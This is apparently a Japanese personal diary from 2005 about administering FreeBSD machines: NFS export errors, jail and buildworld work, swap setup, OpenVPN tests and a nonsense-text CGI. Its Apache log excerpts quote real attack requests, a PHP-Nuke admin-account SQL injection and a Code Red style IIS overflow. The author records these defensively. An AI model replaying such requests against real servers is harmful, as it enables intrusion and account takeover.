client# mount server:/usr/src /usr/src client# mount server:/usr/obj /usr/obj server:/usr/obj: Permission denied server$ less /var/log/messages Feb 23 06:26:39 SERVER mountd[155]: can't change attributes for \ /usr/obj Feb 23 06:26:39 SERVER mountd[155]: bad exports list line /usr/obj \ -maproot Feb 23 06:34:31 SERVER mountd[156]: mount request denied from \ CLIENT for /usr/obj
ハンドブックではわからなかったので、 handbook と睨めっこ。えっと、そのぉ、ひとつのファイルシステムは ひとつのクライアント(指定)に一度しかexportsに指定できないのであると のたまへり。 従って、とあるファイルシステムの複数ディレクトリを同じクライアントに、 個別に export したければ、全部一行に記述すべきなり。 で、/etc/exportsを書き直す。デーモンくんに、きるはっぷを一撃。 今度はうまくいったようだ、多分。
でも流石に今日中には終らない。あと2分では無理。
Copyright (c) 1992-2005 The FreeBSD Project.
Copyright (c) 1994-2005 FreeBSD(98) porting team.
Copyright (c) 1992 A.Kojima F.Ukai M.Ishii (KMC).
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 4.11-RELEASE #0: Wed Feb 23 11:23:10 JST 2005
root@host.domain.tld:/usr/src/sys/compile/MYKERNEL
Timecounter "i8254" frequency 2457600 Hz
Timecounter "TSC" frequency 83326709 Hz
CPU: Overdrive Pentium/P54T Overdrive (83.33-MHz 586-class CPU)
Origin = "GenuineIntel" Id = 0x1532 Stepping = 2
Features=0x13f
real memory = 20971520 (20480K bytes)
avail memory = 15761408 (15392K bytes)
Preloaded elf kernel "kernel" at 0xc03bb000.
Intel Pentium detected, installing workaround for F00F bug
(ry
↑を見て、あわててntpdateする。
おまけ。4.xならpormap(5.xならrpcbind)&& nfsd -u -t -n4 && mountd -r が鯖、 nfsiod -n 4 && mount /mountpoint がクライアント。
# ifconfig $IF $ADDR/32 -alias # jail $JAIL $JAILHOSTNAME $ADDR command #
内外から適当にコマンドを打ったりした。まずはこれだけ。
風博士 on FreeBSD とおぼしき足跡を見て、kazehakase-0.2.5を makeしてみた。が、小一時間で諦め(No such file or directory が出なくなっただけでは駄目だった)、久しぶりにDebianを起動して apt-get。 面白そうだとは思ったが、再度のチャレンジはまた後で。
jail(1)を入れようかと make installworld DESTDIR=$DIRしたらコケた。
$DIRを見てたら、ディレクトリの shcg フラグが消せない。
kern_securelevel="1"がひっかかった模様。
/etc/rc.confを書き換え、再起動後もう一度。
とりあえず入れて、後で、後で...
# du $DIR |tail -n1 149290 $DIR
Googleサーチを経由して、日記のトップページにアクセスし、続いて
HTMLヘッダで指定したスタイルシートや、日記本文に貼付した画像を
順次読み込んでるらしきログに気づいた。
それだけなら珍しくないが、IPが同じではない。末尾(おそらくは
ホストアドレスだけ)が少しずつ異っている。
アクセス時刻(とUSER_AGENT)を見る限り、複数のクライアントが個別に
アクセスしたというより、IPを変えながら一連のセッションを
たどっているように見える。
IPを逆引きすると、某PCベンダのドメインで、 hoge1,hoge2...といった
具合にホスト名が機械的に連続していた。
一体なんだろうなぁ。
Stop in /usr/src. #
Swap_pager: out of spaceとか swap_pager_getswapspace: failed
とか出ていた。
デフォルトの32MBでは足りなかったようだ。とりあえず適当なファイルを
一時スワップ領域にせねば。ぐぐってみて、
こっからコピペ。
# dd if=/dev/zero of=SWAPFILE bs=1024k count=128 ; 128MB # vnconfig -e /dev/vn0b SWAPFILE swap ; 4.x # env - PATH=$PATH /etc/rc.d/addswap start ; 5.x # /usr/sbin/pstat -s ; = swapinfo Device 1K-blocks Used Avail Capacity Type /dev/da0s1b 32640 1936 30704 6% Interleaved /dev/rvn0b 130944 0 130944 0% Interleaved Total 163584 1936 161648 1%
では、もう一度 make buildworld を始めっから。
html形式に書き換えてみた。上下にタグを入れ、行末全部に<br>をつけ、
あとはs/ / /gした。
つまり、ファイルサイズが肥大化しただけだ。今のところ。従って、まだ
どこにもリンク張らない。
make world 開始。現在の設置ではコンソールを叩けないので、FreeBSD(98)の 一台にUSBキーボードを挿し、sshで入って操作した。 役に立たないと書いたのは間違っていた。 はんせーい。
いつしかクラッシュしていた。何故?
放置していたNECノート(MMX166MHz + 64MB)に
FreeBSD5.3を突っ込んだ。今度はFDイメージのみ落し、適当な
ftpサーバを借りてどかどかやった。
再起動後cvsup-without-GUIやbash1 やncftp3をpkg_addして、
stable_update && ports-update。
さてどこに置くか。
電源とHUBが足りなくなってきたが、それに加えてこいつは
ファンの咆哮(特に高負荷時)が並ではない。
Copyright (c) 1992-2004 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004
root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
Timecounter "i8254" frequency 1193182 Hz quality 0
CPU: Pentium/P55C (167.05-MHz 586-class CPU)
Origin = "GenuineIntel" Id = 0x543 Stepping = 3
Features=0x8001bf
real memory = 67108864 (64 MB)
avail memory = 56070144 (53 MB)
Intel Pentium detected, installing workaround for F00F bug
# make bulidworld (ENTER)から、
chmod 444 freebsd.submit.cf まで、丁度34時間かかった。
適当に列挙。
Thu, 24 Feb 2005 01:29:09 +0900 (JST) make buildworld begin
Fri, 25 Feb 2005 11:28:56 +0900 (JST) make buildworld end
Fri, 25 Feb 2005 11:55:39 +0900 (JST) make buildkernel begin
Fri, 25 Feb 2005 16:40:28 +0900 (JST) make buildkernel end
Fri, 25 Feb 2005 16:47:00 +0900 (JST) make installkernel begin
Fri, 25 Feb 2005 16:52:32 +0900 (JST) make installkernel end
Fri, 25 Feb 2005 17:04:30 +0900 (JST) make installworld begin
Fri, 25 Feb 2005 17:58:42 +0900 (JST) make installworld end
mergemaster はどこだったっけ?
これでカーネルもユーザランドもできたてのぴかぴかになった(筈だ)が、
この超過勤務にはマザーもディスクもヨレヨレのガタガタになってしまった
(に違いない)。
では、ゆっくり休みたまえ。
GENERICカーネルさえビルドできなかった。さあどうしよう。
に嵌ったので、cgi-binの下に実行形式ファイルを持ってきて、 簡単なシェルスクリプトと、これまた拙速のsubmit.htmlを用意 してみた。要するにCGIである。
『難解バカボン』【バカ篇】 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ まずスチュワーデスはレオタードをやめる時ミミズとゆーのはカ レーを用意し、結局コカインだけが怪しいので用心したほうがい いでしょう。主としてヒョータンもカタストロフィを穴に埋める わけだからそれにしても必ず悪寒を破壊するとゆーことでとにか くキノコがほとんどヌクレオチドをかっぱらうに決まってます。 もれなく蝋燭はヘモグロビンを利用し、たまにどーにもこーにも 恐ろしいのだーだーだー。幼女は殺すとは難儀ですがつくづくア ドレナリンを推進するんではないでしょーか。 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ もう一度 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 戻る トップページ
残念ながら、これを書いているPCでやってみただけ。鯖に
設置するにはちょっと...。シェルスクリプトでWebクライアントを
回すと簡単にDOS攻撃ができてしまった。同じIPからの接続
回数(というより頻度)に制限を加えないとヤバそう(まあ、
あらゆるコンテンツに言えることだけど)。
あと、利用条件も気にかかるところだ。
プログラム及び添付辞書は無償利用(無断でOK)を認めているが、
サードパーティーの辞書は、二次利用については明記していない
(想定外だったのだろうけど)。
転載の許可はVectorがとってるだろうけど、あとは不明。
これも自分でなんとかしろ、だろうか。
見た。
SERVER 200.232.182.186 - - [27/Feb/2005:21:55:57 +0900] \ "POST /admin.php?op=AddAuthor&add_aid=kiegera&add_name=Goda\ &add_pwd=playboya&add_email=r00t_System@hush.com&add_radminsuper=1\ &admin=eCcgVU5JT04gU0VMRUNUIDEvKjox HTTP/1.0" 404 472
ふと、これを書いているクライアントのapacheログ( 昨日の難解バカボン のためにapacheを起動させていた)を見ると、こんなの。
$ tail $ACCESS_LOG 210.95.76.130 - - [26/Feb/2005:02:43:42 +0900] "GET /default.ida?\ XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801\ %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090\ %u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a \ HTTP/1.0" 404 271
一時パニックになりかけた(NAPTの中のクライアントに、どうやって
アクセスして来た?)が、ふと考え直す。
昨日(というより、感覚的には一昨日に近い)メールサーバをいらった時、
AirHを使ってLANの外に出ていなかったっけ?LANの外からLANの外への
メール中継がうまくいったどうか(Digest-MD5で認証する)確認して
いる最中だったような気が。でテストメールの Recievedをめくる。
やれやれ、油断大敵。喉元を過ぎる前にクライアントにもiptablesを
かけておいた。
当該IPをつつく。↑に感染した事でも分かる通り、よくある放置鯖 と見られた。Pingは通ってもDNS引けなかったし。
アクセスが来るかわからないもんだ...
"GET /css/top.css HTTP/1.1" 200 618 "http://18.41.138.210.xn.2iij.net/" \ "Mozilla/5.0 (Windows; U; Windows NT 5.1 ; ja-JP; rv:1.7.5) \ Gecko/20041217"
失敗した後もう一度やったら、今度はうまくいった。
おや、カスタムカーネルのmakeが止まった。えーと、ScreenLockで ろぐたどってと、使わないかもしれない umass あたりでコケてる。 "- Requires scbus and da" おっと、SCSI使わないから全部無効、は 間違いだったか。再度 make。今度はOKだった。buildworld がうまくいけば いいが。
$ ls -l /boot/kernel/kernel /boot/kernel.GENERIC/kernel -r-xr-xr-x 1 root wheel 5828063 Feb 26 22:18 /boot/kernel.GENERIC/kernel -r-xr-xr-x 1 root wheel 3565317 Feb 27 14:35 /boot/kernel/kernel
を/cgi-bin/だけでなく、日記ページで /POST|GET/ しようとする香具師までいる。 此奴等も晒さねば。とスクリプトをごにょごにょ。
六時間強にわたりアクセスすること98回。 リンクを張ってあるコンテンツをあらかた舐め回して去っていった。 ぐぐると先頭にあったのが こちら。
うっかりktermをcloseしてしまった(指が滑った)。スーパーユーザ から飛んで来たメールの指示に従って、
$ vi -r $HOME/.w3m/w3mXXXX-X
して適当な名前で保存。再度tdiaryに行き、nviで開いて:r savefile。
してみたが、うまくいく様な行かないような。
Note:# openvpn --local $Note --remote $Desktop --ifconfig $Note_ip \ $Desktop.ip --dev tun0 Desktop:# openvpn --local $Desktop --remote $Note --ifconfig $Desktop_ip \ $Note.ip --dev tun0 Note:# ping $Desktop_ip (ry --- Desktop ping statistics --- X packets transmitted, X packets received, 0% packet loss Desktop:# ping $Note_ip (ry --- Note ping statistics --- X packets transmitted, X packets received, 0% packet loss
Note -> Desktop へのアクセス(ftpとtelnet、一晩明けてwww)はスムーズ だったが、逆はいまいちに感じられた。 一眠りするとwwwとsmtpが通じるようになってはいたが、 なぜかftpとtelnetがまだできないでいる。 あ、NoteがPlamoLinux-4.0でDesktopがFreeBSD-5.3である。
iptable -F と vi /etc/hosts."deny\|allow" と、他に何か接続制限あったっけ。
来ていたのに気づいたのは、Googleキャッシュ経由のアクセス を辿ったときだった。
SERVER$ grep "\[26/Feb/2005" $AGENT_LOG|grep -i googlebot|wc -l
13
それ以外は大体 "GET /robots.txt","GET /" だけである。
リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。
※ takanyon [4.11-RELEASEでもsockstatはperl scriptですよ:-) ベースシステムからperlを無くす..]
※ kuzuore [ご指摘どうもです。それに沿って追記しました。]
※ takanyon [ツッコミはやっ(笑) whichがCで書き直されたのは意外にも4.10-RELEASE以降です。 cshやtcshを..]